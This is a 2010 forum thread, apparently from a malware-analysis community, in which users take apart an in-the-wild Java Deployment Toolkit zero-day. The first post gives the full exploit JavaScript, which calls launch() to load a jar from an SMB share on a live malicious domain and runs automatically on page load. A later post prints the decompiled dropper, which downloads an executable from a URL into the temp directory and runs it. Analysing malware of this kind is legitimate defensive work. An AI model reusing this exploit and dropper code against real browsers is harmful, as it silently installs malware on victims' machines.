Author Topic: Java0day tricks  (Read 3591 times)

0 Members and 1 Guest are viewing this topic.

May 06, 2010, 10:54:34 am
Read 3591 times

y0liny

  • Newbie

  • Offline
  • *

  • 5
 :)Hi, try to understand java0day


Code: [Select]
function java_dt()
 {
   try
   {
     var u = "-J-jar -J\\\\ktopolitop.in\\smb\\new.avi http://ktopolitop.in/r_14x_ib/load.php?h=&spl=x1YY";
     if (window.navigator.appName == "Microsoft Internet Explorer")
     {
       try
       {
         var o = document.createElement("OBJECT");
         o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
         o.launch(u);
       }
       catch(e)
       {
         var o2 = document.createElement("OBJECT");
         o2.classid = "clsid:8AD9C840-044E-11D1-B3E9-00805F499D93";
         o2.launch(u);
       }
     }
     else
     {
       var o = document.createElement("OBJECT");
       var n = document.createElement("OBJECT");
       o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
       n.type = "application/java-deployment-toolkit";
       document.body.appendChild(o);
       document.body.appendChild(n);
       try
       {
         o.launch(u);
       }
       catch (e)
       {
         n.launch(u);
       }
     }
   }
   catch (e)
   {
   }
 }
 setTimeout("java_dt();",100); :)

anyone knows how this go into the cache ???
http://ktopolitop.in//smb//new.avi always get's 404.
Need de-compilation jar file after, thx
ROD, BLESS!

May 06, 2010, 11:11:33 am
Reply #1

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
The .avi file is hosted on a SMB/Samba service not on a http service hence the \\\\  which when escaped will come back to just \\ktopolitop .in\smb\new.avi which when I load it shows me 5 files.

May 06, 2010, 11:13:52 am
Reply #2

SysAdMini

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 3335
Code: [Select]
\\\\ktopolitop.in\\smb\\new.avi
is not a http url, but a file on a network share (smb)

Code: [Select]
[code]\\ktopolitop.in\smb\new.avi[/code]

You can't download it by browser or tools like wget.
Ruining the bad guy's day

May 06, 2010, 02:27:06 pm
Reply #3

y0liny

  • Newbie

  • Offline
  • *

  • 5
 :) dl this http

Code: [Select]
main.class
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.net.URLConnection;

public class Main
{
  public static void main(String[] paramArrayOfString)
  {
    String str1 = Math.random() + ".exe";
    String str2 = System.getProperty("java.io.tmpdir");
    try
    {
      paramArrayOfString = new URL(paramArrayOfString[3]);
    }
    catch (MalformedURLException localMalformedURLException)
    {
      return;
    }
    try
    {
      paramArrayOfString = paramArrayOfString.openConnection();
    }
    catch (IOException localIOException1)
    {
      return;
    }
    try
    {
      paramArrayOfString = paramArrayOfString.getInputStream();
    }
    catch (IOException localIOException2)
    {
      return;
    }
    FileOutputStream localFileOutputStream;
    try
    {
      localFileOutputStream = new FileOutputStream(str2 + str1);
    }
    catch (FileNotFoundException localFileNotFoundException)
    {
      return;
    }
    byte[] arrayOfByte = new byte[1024];
    try
    {
      while ((i = paramArrayOfString.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
      {
        int i;
        localFileOutputStream.write(arrayOfByte, 0, i);
      }
    }
    catch (IOException localIOException3)
    {
    }
    try
    {
      paramArrayOfString.close();
    }
    catch (IOException localIOException4)
    {
    }
    try
    {
      localFileOutputStream.close();
    }
    catch (IOException localIOException5)
    {
    }
    Runtime localRuntime = Runtime.getRuntime();
    try
    {
      paramArrayOfString = str2 + str1;
      localRuntime.exec(paramArrayOfString);
      return;
    }
    catch (IOException localIOException6)
    {
    }
  }
}

thx for all.
ROD, BLESS!

June 09, 2010, 04:12:01 am
Reply #4

parody

  • Private Forum
  • Jr. Member

  • Offline
  • *

  • 27
Spotted a tool the other day that made me think of this. I've been using a tool called "smbget" which is like wget for SMB connections. I'm guessing it's a standard tool on any linux install with samba support.